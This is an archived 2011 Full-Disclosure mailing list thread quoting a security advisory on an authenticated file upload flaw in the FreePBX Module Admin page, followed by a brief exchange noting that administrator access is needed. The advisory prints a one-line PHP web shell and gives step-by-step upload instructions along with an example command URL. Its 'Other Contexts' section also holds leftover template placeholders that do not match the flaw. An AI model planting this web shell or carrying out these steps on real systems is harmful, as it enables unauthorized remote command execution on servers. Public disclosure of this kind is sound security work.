lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Thu, 9 Jun 2011 18:25:21 -0300
From: Tiago Ferreira <tiago@...igatorteam.org>
To: Tyler Borland <tborland1@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: FreePBX - Module Administration Arbitrary
	File Upload

unfortunately need administrative access

On Thu, Jun 9, 2011 at 5:11 PM, Tyler Borland <tborland1@...il.com> wrote:

> So you need administrative access to upload the file?
>
> On Thu, Jun 9, 2011 at 7:24 AM, Tiago Ferreira <tiago@...igatorteam.org>wrote:
>
>> ====[ Alligator Security Team
>> ]===============================================
>>
>> FreePBX - Module Administration Arbitrary File Upload
>>
>> Members: Tiago Ferreira < tiago SPAM alligatorteam.org >
>>
>> ====[ Table of Contents
>> ]=====================================================
>>
>> 1. Overview
>> 2. Detailed description
>> 3. Other Contexts & Solutions
>> 4. Thanks
>> 5. References
>>
>> ====[ Overview
>> ]==============================================================
>>
>>     * Systems affected: FreePBX
>>     * Version: 2.9.0.6 (other versions may be affected)
>>     * Release date: [Example Date]
>>     * Impact: Remote command execution
>>
>> "FreePBX is an easy to use GUI (graphical user interface) that controls
>> and
>> manages Asterisk, the world's most popular open source telephony engine
>> software. FreePBX has been developed and hardened by thousands of
>> volunteers
>> over tens of thousands man hours. FreePBX has been downloaded over
>> 5,000,000
>> times and estimates over 500,000 active phone systems."[1]
>>
>> The functionality Module Admin, available for authenticated users within
>> the administrative interface of FreePBX, is prone to a vulnerability which
>> enables an attacker to upload malicious PHP files, and thus, perform
>> remote
>> arbitrary code execution within the context of a web server user."
>>
>> ====[ Detailed description
>> ]==================================================
>>
>> In order to exploit this vulnerability and execute remote commands on a
>> vulnerable FreePBX instance, access to Module Admin (Admin > Setup >
>> Module
>> Admin or, Tools > Setup > Module Admin) is needed. This can be aquired by
>> following the given steps:
>>
>> 1. Create a directory like: webshell
>> 2. Get a PHP file web trojan (webshell.php)
>>
>> Ex.: <? if($_GET['cmd']) {  system($_GET['cmd']);  }?>
>>
>> 3. Put this file into the webshell directory and create a tarball. This
>> zip
>> file name needs to follow the given rule: name-version.[tar|tar.gz|tgz],
>> to
>> our webshell we will do this: tar -czvf webshell-1.0.tar.gz webshell/.
>>
>> 4. On the upload form, browse to the file wbshell-1.0.tar.gz and send it.
>>
>> When the file is uploaded with success, the path for accessing the trojan
>> will be: /admin/modules/webshell/webshell.php.
>>
>> Now, the possibility for executing remote system commands is possible
>> using
>> the uploaded trojan.
>>
>> Ex: http://127.0.0.1/admin/modules/webshell/webshell.php?cmd=whoami
>>
>> ====[ Other Contexts & Solutions
>> ]============================================
>>
>> Description of a possible use case of the mentioned vulnerability.
>>
>> Ex (DoS): A potential attacker could take advantage of this issue to
>> disable
>> the services provided by [software/device] for as long as the attacks
>> occurs.
>>
>> ====[ Thanks/Acknowledgements
>> ]===============================================
>>
>> - Joaquim Brasil < joaquim SPAM alligatorteam.org >
>>
>>
>> ====[ References
>> ]============================================================
>>
>> - [1] http://www.freepbx.org/
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ